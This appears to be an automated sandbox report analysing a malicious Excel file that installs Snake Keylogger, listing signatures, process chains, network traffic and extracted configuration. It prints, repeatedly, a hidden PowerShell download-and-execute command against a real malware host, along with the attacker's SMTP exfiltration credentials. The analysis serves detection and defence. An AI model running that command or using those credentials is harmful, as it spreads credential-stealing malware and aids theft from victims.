Windows Analysis Report
DGTCkacbSz.xlsx

Overview

General Information

Sample name: DGTCkacbSz.xlsx (renamed because original name is a hash value)
Original sample name: 88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39(1).xlsx
Analysis ID: 1562377
MD5: adfcfa59a06bbc5a0faa8f5b0ff663fe
SHA1: 01d4b8e70b641863727d671e9b087633f3b3a37e
SHA256: 88671a5d96d0741f41a8fab45db69ba8331ab55d6cc3fe0077ea3d7f30d82d39
Tags: cia-tf, xlsx, user-JAMESWT_MHT
Infos:

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Bypasses PowerShell execution policy
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Drops VBS files to the startup folder
Drops large PE files
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3492 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • powershell.exe (PID: 3604 cmdline: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile; MD5: A575A7610E5F003CC36DF39E07C4BA7D)
      • tmp667.exe (PID: 3808 cmdline: "C:\Users\user\AppData\Local\Temp\tmp667.exe" MD5: 2ED7362E959D42385D4E6D231A6840DD)
  • wscript.exe (PID: 3960 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" MD5: 045451FA238A75305CC26AC982472367)
    • svcost.exe (PID: 3996 cmdline: "C:\Users\user\AppData\Roaming\svcost.exe" MD5: E3902A9C7AC3C2180B535F81DA7CD147)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000005.00000002.451714574.00000000048B0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x18ff5:$a1: get_encryptedPassword
  • 0x192e1:$a2: get_encryptedUsername
  • 0x18e01:$a3: get_timePasswordChanged
  • 0x18efc:$a4: get_passwordField
  • 0x1900b:$a5: set_encryptedPassword
  • 0x1a688:$a7: get_logins
  • 0x1a5eb:$a10: KeyLoggerEventArgs
  • 0x1a256:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen |
  • 0x1c9b8:$x1: $%SMTPDV$
  • 0x1ca1e:$x2: $#TheHashHere%&
  • 0x1e02f:$x3: %FTPDV$
  • 0x1e123:$x4: $%TelegramDv$
  • 0x1a256:$x5: KeyLoggerEventArgs
  • 0x1a5eb:$x5: KeyLoggerEventArgs
  • 0x1e053:$m2: Clipboard Logs ID
  • 0x1e273:$m2: Screenshot Logs ID
  • 0x1e383:$m2: keystroke Logs ID
  • 0x1e65d:$m3: SnakePW
  • 0x1e24b:$m4: \SnakeKeylogger\
Source | Rule | Description | Author | Strings
5.2.tmp667.exe.48b0000.8.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
5.2.tmp667.exe.3695570.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
5.2.tmp667.exe.3695570.2.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
5.2.tmp667.exe.3695570.2.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x12c85:$a1: get_encryptedPassword
  • 0x12f71:$a2: get_encryptedUsername
  • 0x12a91:$a3: get_timePasswordChanged
  • 0x12b8c:$a4: get_passwordField
  • 0x12c9b:$a5: set_encryptedPassword
  • 0x14318:$a7: get_logins
  • 0x1427b:$a10: KeyLoggerEventArgs
  • 0x13ee6:$a11: KeyLoggerEventArgsEventHandler
5.2.tmp667.exe.3695570.2.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |
  • 0x1a6af:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x198e1:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x19d14:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1ad53:$a5: \Kometa\User Data\Default\Login Data

              System Summary

              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , ProcessId: 3960, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs" , ProcessId: 3960, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3492, ParentProcessName: EXCEL.EXE, ProcessCommandLine: powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;, ProcessId: 3604, ProcessName: powershell.exe
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3604, TargetFilename: C:\Users\user\AppData\Local\Temp\xrkefh21.pa1.ps1

              Data Obfuscation

              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tmp667.exe, ProcessId: 3808, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs
              No Suricata rule has matched

              AV Detection

Source: DGTCkacbSz.xlsx, Avira: detected
Source: https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\svcost.exe, Avira: detection malicious, Label: HEUR/AGEN.1310409
Source: 00000005.00000002.450858713.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendpcamill@juguly.shop", "Password": "rEBS93U9rKLG", "Host": "juguly.shop", "Port": "587", "Version": "5.1"}
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, ReversingLabs: Detection: 68%
Source: DGTCkacbSz.xlsx, ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\svcost.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, Joe Sandbox ML: detected
Source: DGTCkacbSz.xlsx, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.22:49161 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000037CB000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.451596079.00000000047A0000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.00000000024EB000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\tmp667.PDBO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: tmp667.exe, 00000005.00000002.446119875.000000000053F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: tmp667.exe, 00000005.00000002.450858713.00000000036D6000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.450858713.000000000370D000.00000004.00000800.00020000.00000000.sdmp, tmp667.exe, 00000005.00000002.452199848.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, svcost.exe, 00000008.00000002.474407108.0000000002376000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: i0C:\Windows\mscorlib.pdbO source: tmp667.exe, 00000005.00000002.446011562.0000000000408000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe, File opened: C:\Users\user\

              Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, Code function: 4x nop then jmp 00600D90h, 5_2_00600CD8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, Code function: 4x nop then jmp 006B0944h, 5_2_006B08A8
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, Code function: 4x nop then jmp 006B0944h, 5_2_006B0B20
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, Code function: 4x nop then jmp 006B0944h, 5_2_006B0C56
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, Code function: 4x nop then jmp 006FB60Bh, 5_2_006FB401
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, Code function: 4x nop then jmp 006FB60Bh, 5_2_006FB410
Source: C:\Users\user\AppData\Local\Temp\tmp667.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h, 5_2_0498DB88
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then jmp 00C20944h, 8_2_00C20898
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then jmp 00C20944h, 8_2_00C208A8
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then jmp 00C20944h, 8_2_00C20AFE
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then jmp 00C20944h, 8_2_00C20C56
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then jmp 00C2F5D0h, 8_2_00C2F510
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then jmp 00C2F5D0h, 8_2_00C2F518
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then jmp 00C5B60Bh, 8_2_00C5B401
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then jmp 00C5B60Bh, 8_2_00C5B410
Source: C:\Users\user\AppData\Roaming\svcost.exe, Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h, 8_2_04B7DB88
Source: global traffic, DNS query: name: cia.tf
Source: global traffic, TCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.129.178:443
              Source: global traffic | TCP traffic: 172.67.129.178:443 -> 192.168.2.22:49161

              Networking

              Source: Yara match | File source: 5.2.tmp667.exe.3695570.2.raw.unpack, type: UNPACKEDPE
              Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: global traffic | HTTP traffic detected: GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005 | Host: cia.tf | Connection: Keep-Alive
              Source: unknown | HTTPS traffic detected: 172.67.129.178:443 -> 192.168.2.22:49161 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51AE0962.png
              Source: powershell.exe, 00000002.00000002.384599695.000000001C446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: cia.tf
              Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161

